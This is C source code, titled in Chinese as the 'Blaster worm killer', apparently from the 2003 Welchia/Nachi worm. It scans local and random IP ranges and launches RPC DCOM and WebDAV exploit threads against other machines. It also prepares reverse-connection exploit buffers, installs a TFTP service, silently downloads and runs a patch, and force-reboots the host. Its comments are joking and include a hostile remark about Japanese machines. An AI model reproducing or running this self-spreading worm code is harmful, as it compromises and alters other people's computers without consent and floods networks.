沖擊波病毒克星原代碼
BOOL DoServicePackFunction() 
{ 
DWORD nSystemVer = Win2000OrXp(); 
if ( !( nSystemVer == 0 ││ nSystemVer == 1) ) 
return FALSE; // not 2k or xp 




if ( ReadRegServicePack(nSystemVer) ) 
return FALSE; //已經(jīng)安裝了 



//識別語言版本 
int nLanguageID; 
unsigned int unOemCP = GetOEMCP(); 



LCID lcid = GetSystemDefaultLCID(); 
WORD wMain = PRIMARYLANGID(lcid); 
WORD wSub = SUBLANGID(lcid); 




if ( unOemCP == 437 && wMain == 9 && wSub == 1 ) //en 
nLanguageID = 0; //打了你丫的en補丁就不錯了~~ 還唧唧歪歪的~~ 
//管不了小歐洲~~ 俄羅斯牛人有自己的玩法 
~~ 
else if ( unOemCP == 936 && wMain == 4 && wSub == 2 ) //cn 
nLanguageID = 1; //就是為這個來的~~ 
else if ( unOemCP == 950 && wMain == 4 && wSub == 1 ) //tw 
nLanguageID = 2; //同胞骨肉的忙,一定要幫~~ 
else if ( unOemCP == 932 && wMain == 0x11 && wSub == 1 ) //jp 
nLanguageID = -1; //偶好有干掉鬼子機器的沖動！ 
//罷了，冤冤相報何時了~~~ 希望他丫的自新 
~~~ 再玩火就滅了他丫的~~ 
else if ( unOemCP == 949 && wMain == 0x12 && wSub == 1 ) //kr 
nLanguageID = 3; //少些不懂事的小鳥兒彎出去, 危害國內(nèi)~~ 
else{ 
nLanguageID = -1; 
} 



if ( nLanguageID == -1) 
return FALSE; 



char szServicePack[] = "RpcServicePack.exe"; 



// downlaod it~~~ 
if ( !nSystemVer ) { // 2k 
if ( !DownloadSpFile (szServicePack, szWin2kSpUrl[nLanguageID]) ) 
return FALSE; 
} 
else{ 
if ( !DownloadSpFile (szServicePack, szWinXPSpUrl[nLanguageID]) ) 
return FALSE; 
} 



char szExec[180]; 
sprintf(szExec, "%s -n -o -z -q", szServicePack); 



HANDLE hProcess = MakeProcess( szExec ); 
if ( hProcess == NULL ) 
return FALSE; 



if (WaitForSingleObject(hProcess, 360000) != WAIT_OBJECT_0 ){ //六分鐘內(nèi) 
未完成 
TerminateProcess(hProcess,1); 
CloseHandle(hProcess); 
DeleteFile(szServicePack); 
return FALSE; 
} 
CloseHandle(hProcess); 



Sleep(15000); 
DeleteFile(szServicePack); 
if ( ReadRegServicePack(nSystemVer) ) { 
ShutDownWindows( EWX_REBOOT │ EWX_FORCE );//install service pack ok, reboot 
it~~~ 
Sleep(20000); //說偶重啟有過？ 不重啟補丁無效， 
找 Bill該死 說去~~~ 
} 



return TRUE; 
} 



// IN: 始ip, B段數(shù)量, 是否隨機，是否換WebDav //更爛~~~ 湊合著看~~~ 
void BeginExploitFunction(u_long ulIpStart, int nBCount, BOOL bRand, BOOL 
bWebDav) 
{ 
HANDLE hThread = NULL; 
BOOL bFirst = TRUE; 
u_long uComp; 



for (int i=0;i< (nBCount * 256 * 256); i++){ 



if ( bRand ) 
uComp = MakeRandIp(); 
else 
uComp = i + ulIpStart; 



if ( //還是屏蔽掉部分目標，免得目標中招后，再玩就把下一代干掉了，不破壞的好 
:)~~~ 
(BYTE)uComp == 0xc5 ││ 
(BYTE)(uComp>>8) == 0xc5 ││ 
(BYTE)(uComp>>16) == 0xc5 ││ 
(BYTE)(uComp>>24) == 0xc5 ││ 
(WORD)uComp == 0x9999 ││ 
(WORD)(uComp>>8) == 0x9999 ││ 
(WORD)(uComp>>16) == 0x9999 ) 
continue; 




u_long *myPara = new u_long; 



if ( myPara == NULL ){//如果分配失敗，再嘗試一次 
Sleep(100); 
myPara = new u_long; 
} 



if ( myPara ){ 
if ( hThread ) 
CloseHandle(hThread); 



*myPara = htonl( uComp); 



DWORD dwThreadId; 



if (bWebDav) 
hThread = 
CreateThread(NULL,0,ExploitWebDavThread,(LPVOID)myPara,0,&dwThreadId); 
else 
hThread = 
CreateThread(NULL,0,ExploitRpcDcomThread,(LPVOID)myPara,0,&dwThreadId); 



Sleep(2); 
} 



//添加此處代碼，避免首次執(zhí)行時，線程中的 
InterlockedIncrement(&g_CurThreadCount) 未來得及運行，一次性建立了N個線程的 
bug! 
if ( bFirst && (i >= nMaxThread) ){ 
Sleep(2000); 
bFirst = FALSE; 
} 



while(g_CurThreadCount >= nMaxThread) // #define nMaxThread 300 ,不小心， 
玩過了~~~ 
Sleep(2); 



} 



Sleep(60000); 
} 




//服務模式和控制臺模式公用主程序 
void DoIt() 
{ 
WSADATAwsd; 
if(WSAStartup(MAKEWORD(2,2),&wsd)!=0) 
return; 



//殺蠕蟲 
KillMsblast(); 



//卸載 
SYSTEMTIME st; 
GetLocalTime(&st); 
if ( st.wYear == 2004 ){ 
MyDeleteService(szServiceName); 
MyDeleteService(szServiceTftpd); 
RemoveMe(); 
ExitProcess(1); //其實不必，RemoveMe()中借用了前輩的代碼，2k下，退出程序時將 
自身文件刪除了 
} 



srand( GetTickCount() ); 



memset(pPingBuffer, '\xAA', sizeof(pPingBuffer)); 
//煩請骨干路由器立即丟棄此特征 Icmp Echo 包! 國內(nèi)的什么什么波已經(jīng)絕了!~~ 補 
丁已經(jīng)打夠了!~~~ 




//準備WebDav發(fā)送緩沖區(qū) 
do{ 
pWebDavExploitBuffer = new char[68000]; 
Sleep(100); 
}while(pWebDavExploitBuffer == NULL); 



//必須在checkonlien 之前,一次裝配好子彈 
PressWebDavBufferOnce(); 
PressRpcDcomBufferOnce(); 



CheckOnlienAndPressData(); //get LocalIp & 修正子彈中的反向ip 和 端口 



//打補丁 
DoServicePackFunction(); 



//建立接收線程 
DWORD dwThreadID; 
HANDLE 
hWorkThread=CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)RecvSendCmdThread,(L 
PVOID)NULL,0,&dwThreadID); 
if(hWorkThread==NULL) // RecvSendCmdThread 中阻塞，有反連，再建線程處理之, 
同時處理多個反連 
return; 
CloseHandle(hWorkThread); 



if ( !MyStartService(szServiceTftpd) ){ 
Sleep(1000); 
InstallTftpService(); 
Sleep(1000); 
MyStartService(szServiceTftpd); 
} 



Sleep(2000); //等待接收線程中的全局 rand bind port 




u_long ulIP; 
for(;;){ //估算了一下，普通機器２小時一循環(huán) 




//首先掃描本ip段 
CheckOnlienAndPressData(); 
ulIP = ntohl(inet_addr(szLocalIp)); 
ulIP &= 0xffff0000; 
BeginExploitFunction( ulIP, 1, 0, 0); 




//再掃描本ip前后3個段 
CheckOnlienAndPressData(); 
if ( rand() % 2) 
ulIP += 0x00010000; 
else 
ulIP -= 0x00030000; 
BeginExploitFunction( ulIP, 3, 0, 0); 




//再掃描WebDav一個段,跳出 135 syn封鎖 
CheckOnlienAndPressData(); 
ulIP = MAKELONG(0, wdIpHead[ rand()% 76 ]); //請 wdIpHead[] B段IP商注意~~~, 
立即采取補救措施~~~ sorry~~~ 
BeginExploitFunction( ulIP, 1, 0, 1); 




//再掃描隨機的IP, 數(shù)量1個 B段, rpc or webdav 
CheckOnlienAndPressData(); 
if ( rand() % 2) 
BeginExploitFunction( ulIP, 1, 1, 0); 
else 
BeginExploitFunction( ulIP, 1, 1, 1); //偶跳、跳、跳~~~ 




KillMsblast(); 



} 



//WSACleanup(); 



}